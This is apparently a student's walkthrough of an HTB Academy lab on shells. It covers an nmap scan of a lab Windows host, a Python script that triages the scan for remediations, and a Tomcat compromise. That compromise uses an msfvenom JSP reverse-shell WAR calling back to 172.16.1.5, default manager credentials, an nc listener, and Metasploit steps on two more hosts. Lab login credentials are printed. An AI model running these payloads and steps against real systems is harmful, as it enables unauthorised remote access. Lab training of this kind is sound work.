The Live Engagement

April 30, 2024

First we have to log in to the IP that was given.

RDP to 10.129.86.5 with user "htb-student" and password "HTB_@cademy_stdnt!"

Then we run an nmap scan against the first host, 172.16.1.11.

# Nmap 7.92 scan initiated Tue Apr 30 02:56:03 2024 as: nmap -sC -sV -oN firsthost.nmap 172.16.1.11
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.026s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
515/tcp  open  printer       Microsoft lpd
1801/tcp open  msmq?
2103/tcp open  msrpc         Microsoft Windows RPC
2105/tcp open  msrpc         Microsoft Windows RPC
2107/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2024-04-29T06:08:54
|_Not valid after:  2024-10-29T06:08:54
|_ssl-date: 2024-04-30T06:57:03+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: SHELLS-WINSVR
|   NetBIOS_Domain_Name: SHELLS-WINSVR
|   NetBIOS_Computer_Name: SHELLS-WINSVR
|   DNS_Domain_Name: shells-winsvr
|   DNS_Computer_Name: shells-winsvr
|   Product_Version: 10.0.17763
|_  System_Time: 2024-04-30T06:56:57+00:00
8080/tcp open  http          Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/10.0.11
|_http-favicon: Apache Tomcat
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: shells-winsvr
|   NetBIOS computer name: SHELLS-WINSVR\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-29T23:56:57-07:00
| smb2-time: 
|   date: 2024-04-30T06:56:57
|_  start_date: N/A
|_clock-skew: mean: 1h23m59s, deviation: 3h07m49s, median: -1s
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:17:44 (VMware)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 30 02:57:03 2024 -- 1 IP address (1 host up) scanned in 59.90 seconds
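As an added triage example (not part of the original writeup), the script below parses the nmap normal-format output above, using a constructed trimmed copy of it embedded inline, and flags what a defender would remediate on this host: the TRACE method on 80, RDP on 3389, Tomcat on 8080, and SMB signing not enforced on 445.

```python
import re
# Constructed, trimmed copy of the nmap -oN output shown above (hypothetical
# sample; the real scan lists more ports and host scripts).
SAMPLE_SCAN = """\
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8080/tcp open  http          Apache Tomcat 10.0.11
|_http-title: Apache Tomcat/10.0.11
Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
"""
# Matches only open ports; closed/filtered lines are ignored on purpose.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def parse_ports(text):
    """Return {port: {"service", "version", "script": [lines]}} from nmap -oN text."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = {"service": m.group(3), "version": m.group(4).strip(), "script": []}
        elif current is not None and line.startswith("|"):
            # NSE script output lines belong to the most recent port entry.
            ports[current]["script"].append(line.lstrip("|_ ").strip())
        elif line.startswith("Host script results"):
            current = None  # host-level scripts are not tied to a port
    return ports

def triage(text):
    """Map the parsed scan to (port, remediation) findings a defender would raise."""
    ports, findings = parse_ports(text), []
    for port, info in ports.items():
        script = " ".join(info["script"])
        if "TRACE" in script:
            findings.append((port, "HTTP TRACE enabled; disable it to prevent cross-site tracing"))
        if info["service"] == "ms-wbt-server":
            findings.append((port, "RDP exposed; restrict to jump hosts and enforce NLA/MFA"))
        if "Apache Tomcat" in info["version"]:
            findings.append((port, "Tomcat reachable; lock down /manager and rotate its credentials"))
    if "Message signing enabled but not required" in text or "message_signing: disabled" in text:
        findings.append((445, "SMB signing not enforced; require signing via GPO to block relay"))
    return sorted(findings)
```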

Then we search for an exploit for the Tomcat web server.

But it failed.

We tried both IPs, but it still failed.

Then we change the payload for the exploit.

msfvenom -l payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war -o shell.war

Click the Manager App

User - tomcat
Pass - Tomcatadm

Upload the WAR file.

After several attempts to upload the WAR reverse shell, it succeeded.

Set up a listener and access the shell.

nc -lnvp 9001

  • Second host - 172.16.1.12 or blog.inlanefreight.local

Use reload_all to refresh the modules in msfconsole.

reload_all
run 
shell
cat /customscripts/flag.txt

  • Third host - 172.16.1.13

use 1
options
set rhost 172.16.1.13
set lhost 172.16.1.5
run
